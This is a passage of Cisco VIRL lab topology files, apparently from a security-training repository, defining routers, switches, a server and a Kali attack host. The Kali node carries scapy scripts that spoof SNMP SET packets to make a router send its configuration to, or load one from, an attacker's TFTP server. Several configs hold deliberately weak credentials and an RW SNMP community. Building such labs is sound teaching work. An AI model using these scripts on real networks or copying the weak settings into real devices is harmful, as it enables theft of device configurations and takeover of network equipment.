License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ banner incoming ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ banner login ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ ! line con 0 password 7 0822455D0A16 line aux 0 line vty 0 4 exec-timeout 720 0 password 7 1511021F0725 transport input telnet ssh ! no scheduler allocate ! end </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.0.1" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="iosv-1" type="SIMPLE" subtype="IOSv" location="417,76" ipv4="192.168.0.1"> <extensions> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> <entry key="config" type="String">! IOS Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! hostname iosv-1 boot-start-marker boot-end-marker ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! no aaa new-model ! ! ip cef ipv6 unicast-routing ipv6 cef ! ! service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ip domain name virl.info crypto key generate rsa modulus 768 ip ssh server algorithm authentication password username cisco privilege 15 secret cisco ip access-list standard IN-VTY permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.255 ip access-list standard SNMP-RW permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 snmp-server community supersecret rw SNMP-RW line vty 0 4 transport input ssh telnet access-class IN-VTY in vrf-also exec-timeout 720 0 password cisco login local line con 0 password cisco ! cdp run ! ! interface Loopback0 description Loopback ip address 192.168.0.1 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ! Configured on launch no ip address cdp enable duplex full speed auto no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.2 255.255.128.0 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/2 description to iosvl2-2 ip address 10.0.128.1 255.255.255.252 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! interface GigabitEthernet0/3 description to admin-1 ip address 10.0.128.5 255.255.255.252 cdp enable ip ospf cost 1 duplex full speed auto no shutdown ! ! ! router ospf 1 network 192.168.0.1 0.0.0.0 area 0 log-adjacency-changes passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 10.0.128.0 0.0.0.3 area 0 network 10.0.128.4 0.0.0.3 area 0 ! ! router bgp 1 bgp router-id 192.168.0.1 no synchronization ! ibgp ! ibgp peers ! neighbor 192.168.0.4 remote-as 1 neighbor 192.168.0.4 description iBGP peer iosv-2 neighbor 192.168.0.4 update-source Loopback0 ! ! ! address-family ipv4 network 192.168.0.1 mask 255.255.255.255 neighbor 192.168.0.4 activate exit-address-family ! ! ! end</entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.2" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> <interface id="1" name="GigabitEthernet0/2" ipv4="10.0.128.1" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="server-1" type="SIMPLE" subtype="server" location="592,287"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: server-1 manage_etc_hosts: true package_update: true packages: - snmp - freeradius - tshark runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart - cp /tmp/clients.conf.new /etc/freeradius/clients.conf - cp /tmp/users.new /etc/freeradius/users - systemctl enable freeradius - systemctl start freeradius users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ip route del default ip route add default via 172.16.1.2 ifconfig eth1 up 10.0.128.2 netmask 255.255.255.252 route add -host 192.168.0.1 gw 10.0.128.1 dev eth1 route add -host 192.168.0.4 gw 10.0.128.1 dev eth1 route add -net 10.0.0.0/17 gw 10.0.128.1 dev eth1 route add -net 10.0.128.0/30 gw 10.0.128.1 dev eth1 exit 0 - path: /tmp/clients.conf.new content: | client 192.168.0.0/24 { secret = ciscocisco nastype = cisco shortname = virl } owner: "root:root" permissions: '0640' - path: /tmp/users.new content: | admin Cleartext-Password := "secret123" Service-Type = NAS-Prompt-User, Cisco-AVPair = "shell:priv-lvl=15" owner: "root:root" permissions: '0640' - path: /home/cisco/snmp-chatter.sh content: | #!/bin/bash while true; do snmpget -v 2c -c supersecret 192.168.0.4 1.3.6.1.2.1.1.1.0 sleep 15 done owner: "cisco:cisco" permissions: '0755' - path: /home/cisco/http-chatter.sh content: | #!/bin/bash while true; do curl -u admin:secret123 http://192.168.0.4 sleep 15 done owner: "cisco:cisco" permissions: '0755' </entry> </extensions> <interface id="0" name="eth1" ipv4="10.0.128.2" netPrefixLenV4="30"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">3</entry> </extensions> </interface> </node> <node name="iosv-2" type="SIMPLE" subtype="IOSv" location="370,291" ipv4="192.168.0.4"> <extensions> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> <entry key="config" type="String">! IOS Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! version 15.6 service timestamps debug datetime msec service timestamps log datetime msec service password-encryption ! hostname iosv-2 ! boot-start-marker boot-end-marker ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! enable password 7 060506324F41 ! aaa new-model ! ! aaa authentication login default group radius local line aaa authorization exec default group radius if-authenticated ! ! ! ! ! aaa session-id common ethernet lmi ce ! ! ! mmi polling-interval 60 no mmi auto-configure no mmi pvc mmi snmp-timeout 180 ! ! ! ! ! ! ! ! ! ! ! no ip domain lookup ip domain name virl.info ip cef ipv6 unicast-routing ipv6 cef ! multilink bundle-name authenticated ! ! ! ! username cisco privilege 15 secret 5 $1$WaUX$blEhl/Fee6CSV8WMIvhv4. ! redundancy ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! interface Loopback0 description Loopback ip address 192.168.0.4 255.255.255.255 ! interface GigabitEthernet0/0 description OOB Management vrf forwarding Mgmt-intf ip address 172.16.1.182 255.255.255.0 duplex full speed auto media-type rj45 ! interface GigabitEthernet0/1 description to iosvl2-1 ip address 10.0.0.3 255.255.128.0 ip ospf cost 1 duplex full speed auto media-type rj45 ! router ospf 1 passive-interface Loopback0 network 10.0.0.0 0.0.127.255 area 0 network 192.168.0.4 0.0.0.0 area 0 ! router bgp 1 bgp router-id 192.168.0.4 bgp log-neighbor-changes neighbor 192.168.0.1 remote-as 1 neighbor 192.168.0.1 description iBGP peer iosv-1 neighbor 192.168.0.1 update-source Loopback0 ! address-family ipv4 network 192.168.0.4 mask 255.255.255.255 neighbor 192.168.0.1 activate exit-address-family ! ip forward-protocol nd ! ! ip http server ip http authentication aaa login-authentication default no ip http secure-server ip ssh server algorithm authentication password ! ip access-list standard SNMP-RW permit 172.16.1.0 0.0.0.255 permit 192.168.0.0 0.0.0.255 permit 10.0.128.0 0.0.0.3 ! ip radius source-interface Loopback0 ! snmp-server community supersecret RW SNMP-RW snmp-server chassis-id ! ! ! radius server RADIUS address ipv4 10.0.128.2 auth-port 1812 acct-port 1813 key 7 13061E0108030723382727 ! ! control-plane ! banner exec ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ banner incoming ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ banner login ^ ************************************************************************** * IOSv - Cisco Systems Confidential * * * * Supplemental End User License Restrictions * * * * This IOSv software is provided AS-IS without warranty of any kind. * * Under no circumstances may this software be used separate from * * the Cisco Modeling Labs Software that this software was provided * * with, or deployed or used as part of a production environment. * * * * By using the software, you agree to abide by the terms and * * conditions of the Cisco End User License Agreement at * * http://www.cisco.com/go/eula. * * * * Unauthorized use or distribution of this software is expressly * * prohibited. * ************************************************************************** ^ ! line con 0 password 7 0822455D0A16 line aux 0 line vty 0 4 exec-timeout 720 0 password 7 1511021F0725 transport input telnet ssh ! no scheduler allocate ! end</entry> </extensions> <interface id="0" name="GigabitEthernet0/1" ipv4="10.0.0.3" netPrefixLenV4="17"> <extensions> <entry key="AutoNetkit.vlan" type="Integer">2</entry> </extensions> </interface> </node> <node name="admin-1" type="SIMPLE" subtype="lxc" location="605,72"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: admin-1 manage_etc_hosts: true runcmd: - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - service sshd restart users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ifconfig eth1 up 10.0.128.6 netmask 255.255.255.252 route add -host 192.168.0.1 gw 10.0.128.5 dev eth1 route add -host 192.168.0.4 gw 10.0.128.5 dev eth1 route add -net 10.0.0.0/16 gw 10.0.128.5 dev eth1 route add -host 192.168.0.1 gw 10.0.128.5 dev eth1 route add -host 192.168.0.4 gw 10.0.128.5 dev eth1 exit 0 </entry> </extensions> <interface id="0" name="eth1"/> </node> <annotations/> <connection dst="/virl:topology/virl:node[2]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[2]" src="/virl:topology/virl:node[4]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[4]/virl:interface[2]" src="/virl:topology/virl:node[2]/virl:interface[2]"/> <connection dst="/virl:topology/virl:node[1]/virl:interface[3]" src="/virl:topology/virl:node[3]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[2]/virl:interface[3]" src="/virl:topology/virl:node[5]/virl:interface[1]"/> <connection dst="/virl:topology/virl:node[6]/virl:interface[1]" src="/virl:topology/virl:node[1]/virl:interface[4]"/> <connection dst="/virl:topology/virl:node[7]/virl:interface[1]" src="/virl:topology/virl:node[4]/virl:interface[3]"/> </topology>
h4cker/virl_topologies/8.13.virl
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <topology xmlns="http://www.cisco.com/VIRL" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" schemaVersion="0.95" xsi:schemaLocation="http://www.cisco.com/VIRL https://raw.github.com/CiscoVIRL/schema/v0.95/virl.xsd"> <extensions> <entry key="AutoNetkit.infrastructure_only" type="Boolean">false</entry> <entry key="management_network" type="String">flat</entry> <entry key="AutoNetkit.enable_cdp" type="Boolean">true</entry> <entry key="AutoNetkit.IGP" type="String">ospf</entry> </extensions> <node name="iosvl2-1" type="SIMPLE" subtype="IOSvL2" location="296,180"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-1 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-2 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to kali-1 switchport access vlan 2 switchport mode access no shutdown ! interface GigabitEthernet1/0 description to iosv-2 switchport access vlan 2 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> <interface id="3" name="GigabitEthernet1/0"/> <interface id="4" name="GigabitEthernet1/1"/> </node> <node name="iosvl2-2" type="SIMPLE" subtype="IOSvL2" location="520,177"> <extensions> <entry key="config" type="string">! IOSvL2 Config generated on 2017-08-27 23:10 ! by autonetkit_0.23.5 ! version 15.2 service timestamps debug datetime msec service timestamps log datetime msec no service password-encryption service compress-config no service config enable password cisco ip classless ip subnet-zero no ip domain lookup ! line vty 0 4 transport input ssh telnet exec-timeout 720 0 password cisco login ! line con 0 password cisco ! hostname iosvl2-2 ! boot-start-marker boot-end-marker ! ! ! no aaa new-model ! vtp domain virl.lab vtp mode transparent ! vlan 2 name ank_vlan2 vlan 3 name ank_vlan3 ! ! ! ! cdp run ! ! ! ip cef no ipv6 cef ! ! spanning-tree mode pvst spanning-tree extend system-id ! vlan internal allocation policy ascending ! ! ! ! vrf definition Mgmt-intf ! address-family ipv4 exit-address-family ! address-family ipv6 exit-address-family ! ! ! ! ! interface Loopback0 description Loopback ! interface GigabitEthernet0/0 description OOB management ! Configured on launch no switchport vrf forwarding Mgmt-intf no ip address no shutdown ! interface GigabitEthernet0/1 description to iosvl2-1 switchport trunk encapsulation dot1q switchport mode trunk no shutdown ! interface GigabitEthernet0/2 description to iosv-1 switchport access vlan 3 switchport mode access no shutdown ! interface GigabitEthernet0/3 description to server-1 switchport access vlan 3 switchport mode access no shutdown ! ! ip forward-protocol nd ! no ip http server no ip http secure-server ! ! ! ! ! ! control-plane ! ! ! end </entry> <entry key="AutoNetkit.mgmt_ip" type="string"></entry> </extensions> <interface id="0" name="GigabitEthernet0/1"/> <interface id="1" name="GigabitEthernet0/2"/> <interface id="2" name="GigabitEthernet0/3"/> </node> <node name="kali-1" type="SIMPLE" subtype="kali" location="193,282"> <extensions> <entry key="config" type="String">#cloud-config bootcmd: - ln -s -t /etc/rc.d /etc/rc.local hostname: kali-1 manage_etc_hosts: true package_update: true packages: - quagga bootcmd: - ip route del default via 172.16.1.1 - ip route add default via 172.16.1.2 runcmd: - start ttyS0 - systemctl start [email protected] - systemctl start rc-local - sed -i '/^\s*PasswordAuthentication\s\+no/d' /etc/ssh/sshd_config - echo "UseDNS no" &gt;&gt; /etc/ssh/sshd_config - service ssh restart - systemctl enable zebra ospfd users: - default - gecos: User configured by VIRL Configuration Engine 0.23.10 lock-passwd: false name: cisco plain-text-passwd: cisco shell: /bin/bash ssh-authorized-keys: - VIRL-USER-SSH-PUBLIC-KEY sudo: ALL=(ALL) ALL write_files: - path: /etc/init/ttyS0.conf owner: root:root content: | # ttyS0 - getty # This service maintains a getty on ttyS0 from the point the system is # started until it is shut down again. start on stopped rc or RUNLEVEL=[12345] stop on runlevel [!12345] respawn exec /sbin/getty -L 115200 ttyS0 vt102 permissions: '0644' - path: /etc/systemd/system/[email protected] content: | [Unit] Description=Run dhclient on %i interface After=network.target [Service] Type=oneshot ExecStart=/sbin/dhclient %i -pf /var/run/dhclient.%i.pid -lf /var/lib/dhclient/dhclient.%i.lease RemainAfterExit=yes owner: root:root permissions: '0644' - path: /etc/network/interfaces owner: root:root permissions: '0644' content: |- source-directory /etc/network/interfaces.d auto eth0 iface eth0 inet dhcp gateway 172.16.1.2 - path: /etc/rc.local owner: root:root permissions: '0755' content: |- #!/bin/sh ip route del default ip route add default via 172.16.1.2 ip link set eth1 up ip addr add 10.0.0.1/17 dev eth1 # Use routes from Quagga instead #route add -host 192.168.0.1 gw 10.0.0.2 dev eth1 #route add -host 192.168.0.4 gw 10.0.0.2 dev eth1 #route add -net 10.0.0.0/17 gw 10.0.0.2 dev eth1 #route add -net 10.0.128.0/30 gw 10.0.0.2 dev eth1 #route add -host 192.168.0.1 gw 10.0.0.3 dev eth1 #route add -host 192.168.0.4 gw 10.0.0.3 dev eth1 #route add -net 10.0.0.0/17 gw 10.0.0.3 dev eth1 #route add -net 10.0.128.0/30 gw 10.0.0.3 dev eth1 exit 0 - path: /etc/network/interfaces.d/eth1 owner: root:root permissions: '0644' content: |- iface eth1 inet manual - path: /etc/quagga/zebra.conf owner: root:root permissions: '0644' content: |- hostname kali-1 password cisco enable password cisco interface eth0 interface eth1 line vty - path: /etc/quagga/ospfd.conf owner: root:root permissions: '0644' content: |- hostname kali-1 password cisco log stdout interface eth1 ip ospf cost 1 router ospf ospf router-id 10.0.0.1 network 10.0.0.1/17 area 0.0.0.0 network 192.168.0.4/32 area 0.0.0.0 network 10.0.128.2/32 area 0 line vty - path: /root/get-cisco-config.py owner: root:root permissions: '0755' content: |- #!/usr/bin/env python # See # http://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html # and # http://tools.cisco.com/Support/SNMP/do/BrowseMIB.do?local=en&amp;mibName=CISCO-CONFIG-COPY-MIB # for details from optparse import OptionParser from scapy.all import conf,IP,SNMP,SNMPset,ASN1_OID,ASN1_IPADDRESS,UDP,SNMPvarbind,send parser = OptionParser() parser.add_option("-i", "--iface", dest="iface", help="Interface", default="eth1") parser.add_option("-s", "--src", dest="srcip", help="Source IP Address", default="192.168.1.2") parser.add_option("-d", "--dst", dest="dstip", help="Destination IP Address", default="192.168.1.1") parser.add_option("-t", "--tftp", dest="tftpip", help="TFTP Server IP Address", default="192.168.1.2") parser.add_option("-f", "--cfg", dest="cfg_file", help="Configuration Filename") parser.add_option("-c", "--community", dest="snmpstring", help="SNMP Community Set String", default="secret") (options, args) = parser.parse_args() if options.cfg_file is None: options.cfg_file = "%s-config" % (options.dstip) print "Attempting to download IOS config from %s" % (options.dstip) conf.iface = options.iface i=IP(src=options.srcip,dst=options.dstip)/UDP(sport=161,dport=161) s1=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=6)] ) ) s2=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyProtocol(2) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.2.112"),value=1)] ) ) s3=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopySourceFileType(3) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.3.112"),value=4)] ) ) s4=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyDestFileType(4) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.4.112"),value=1)] ) ) s5=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyServerAddress(5) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.5.112"),value=ASN1_IPADDRESS(options.tftpip))] ) ) s6=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyFileName(6) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.6.112"),value=options.cfg_file)] ) ) s7=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=1)] ) ) send(i/s1) send(i/s2) send(i/s3) send(i/s4) send(i/s5) send(i/s6) send(i/s7) - path: /root/merge-cisco-config.py owner: root:root permissions: '0755' content: |- #!/usr/bin/env python # See # http://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/15217-copy-configs-snmp.html # and # http://tools.cisco.com/Support/SNMP/do/BrowseMIB.do?local=en&amp;mibName=CISCO-CONFIG-COPY-MIB # for details from optparse import OptionParser from scapy.all import conf,IP,SNMP,SNMPset,ASN1_OID,ASN1_IPADDRESS,UDP,SNMPvarbind,send parser = OptionParser() parser.add_option("-i", "--iface", dest="iface", help="Interface", default="eth1") parser.add_option("-s", "--src", dest="srcip", help="Source IP Address", default="192.168.1.2") parser.add_option("-d", "--dst", dest="dstip", help="Destination IP Address", default="192.168.1.1") parser.add_option("-t", "--tftp", dest="tftpip", help="TFTP Server IP Address", default="192.168.1.2") parser.add_option("-f", "--cfg", dest="cfg_file", help="Configuration Filename") parser.add_option("-c", "--community", dest="snmpstring", help="SNMP Community Set String", default="secret") (options, args) = parser.parse_args() if options.cfg_file is None: options.cfg_file = "%s-config" % (options.dstip) print "Attempting to upload IOS config to %s" % (options.dstip) conf.iface = options.iface i=IP(src=options.srcip,dst=options.dstip)/UDP(sport=161,dport=161) s1=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=6)] ) ) s2=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyProtocol(2) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.2.112"),value=1)] ) ) s3=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopySourceFileType(3) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.3.112"),value=1)] ) ) s4=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyDestFileType(4) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.4.112"),value=4)] ) ) s5=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyServerAddress(5) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.5.112"),value=ASN1_IPADDRESS(options.tftpip))] ) ) s6=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyFileName(6) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.6.112"),value=options.cfg_file)] ) ) s7=SNMP( community=options.snmpstring, PDU=SNMPset( # iso(1) identified-organization(3) dod(6) internet(1) private(4) # enterprise(1) cisco (9) ciscoMgmt(9) ciscoConfigCopyMIB(96) # ciscoConfigCopyMIBObjects(1) ccCopy(1) ccCopyTable(1) ccCopyEntry(1) # ccCopyEntryRowStatus(14) RANDOM(112) varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.4.1.9.9.96.1.1.1.1.14.112"),value=1)] ) ) send(i/s1) send(i/s2) send(i/s3) send(i/s4) send(i/s5) send(i/s6) send(i/s7) - path: /etc/default/atftpd owner: root:root permissions: '0644' content: |- USE_INETD=false # OPTIONS below are used only with init script OPTIONS="--tftpd-timeout 300 --retry-timeout 5 --mcast-port 1758 --mcast-addr 239.239.239.0-255 --mcast-ttl 1 --maxthread 100 --verbose=5 /srv/tftp" - path: /srv/tftp/router.cfg owner: nobody:nogroup permissions: '0644' content: |- ! ! Last configuration change at 23:19:07 UTC Tue Aug 29 2017 by cisco ! version 15.6 service timestamps debug datetime msec service timestamps log datetime msec service password-encryption ! hostname iosv-2 ! boot-start-marker boot-end-marker ! ! vrf definition Mgmt-intf ! address-family ipv4 